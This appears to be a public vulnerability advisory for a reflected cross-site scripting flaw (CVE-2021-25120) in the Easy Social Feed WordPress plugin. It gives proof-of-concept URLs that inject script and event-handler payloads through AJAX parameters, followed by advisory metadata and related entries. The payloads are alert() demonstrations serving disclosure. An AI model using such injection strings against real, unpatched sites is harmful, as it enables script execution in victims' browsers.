Easy Social Feed < 6.2.7 – Reflected Cross-Site Scripting | CVE 2021-25120 | Plugin Vulnerabilities

Description

The plugins do not sanitise some of their parameters used via AJAX actions before outputting them back in the response, leading to Reflected Cross-Site Scripting issues

Proof of Concept

Pro version:
https://example.com/wp-admin/admin-ajax.php?action=efbl_load_feed_popup&pid="><script>alert(2)</script> (Fixed in 6.2.5)
https://example.com/wp-admin/admin-ajax.php?action=efbl_load_feed_popup&pid="><script>alert(/XSS/)</script>&link_target="><script>alert(/XSS2/)</script> (Fixed in 6.2.5)
https://example.com/wp-admin/admin-ajax.php?action=efbl_load_feed_popup&pid=1&link_target=%22onmouseover=alert(/XSS2/)// (Fixed in 6.2.7)

Free version (< 6.2.7):
https://example.com/wp-admin/admin-ajax.php?action=efbl_generate_popup_html&rand_id=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E (fixed in 6.2.7)

Affects Plugins

easy-facebook-likebox-premium

Fixed in 6.2.7

easy-facebook-likebox

Fixed in 6.2.7

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Thura Moe Myint

Submitter

mgthuramoemyint

Submitter twitter

mgthuramoemyint

Verified

Yes

WPVDB ID

0ad020b5-0d16-4521-8ea7-39cd206ab9f6

Timeline

Publicly Published

2021-08-12 (about 4 years ago)

Added

2022-03-24 (about 3 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2025-08-18

Title

Flexible Maps < 1.19.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Flexible Maps Shortcode

Published

2025-07-16

Title

Simple Link Directory < 14.8.1 - Reflected Cross-Site Scripting

Published

2024-09-01

Title

Polls CP <= 1.0.75 - Admin+ Stored Cross-Site Scripting

Published

2025-08-26

Title

Theme Blvd Widget Areas <= 1.3.0 - Reflected Cross-Site Scripting

Published

2014-08-01

Title

Thank You Counter Button - Multiple Stored Cross-Site Scripting (XSS)